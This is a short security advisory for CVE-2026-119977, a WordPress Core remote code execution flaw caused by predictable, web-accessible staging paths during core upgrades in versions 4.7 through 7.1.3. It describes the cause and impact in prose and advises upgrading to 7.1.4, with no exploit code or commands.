CVE-2026-119977
Overview
This vulnerability is a remote code execution flaw caused by predictable and web-accessible staging directories created during the full-package core upgrade process in WordPress. The affected component is the WordPress Core upgrader, which uses fixed staging paths that can be accessed without authentication. The flaw arises from improper isolation and unpredictable path generation, allowing external actors to interact with upgrade files during the upgrade window.
Vulnerability Description
WordPress Core is vulnerable to Remote Code Execution in versions 4.7 through 7.1.3. This is due to predictable, web-accessible staging paths used during full-package core upgrades. This makes it possible for unauthenticated attackers to execute code on the server during the upgrade window.
Impact
An unauthenticated attacker can execute arbitrary code on the server hosting WordPress during the upgrade window by exploiting predictable staging paths. This allows full system compromise, including unauthorized access to sensitive data and control over server operations. No authentication or user interaction is required, making it possible to conduct attacks remotely and stealthily during the upgrade process, potentially disrupting services and compromising business-critical assets.
Solution
Upgrade WordPress Core to version 7.1.4 or later, where the staging path handling has been secured to prevent web access during upgrades. Refer to the official WordPress advisory and changelogs at https://core.trac.wordpress.org/browser/tags/7.1.3/src/wp-admin/includes/class-wp-upgrader.php#L378 and https://core.trac.wordpress.org/browser/tags/7.1.3/src/wp-admin/includes/class-core-upgrader.php#L162 for patch details.
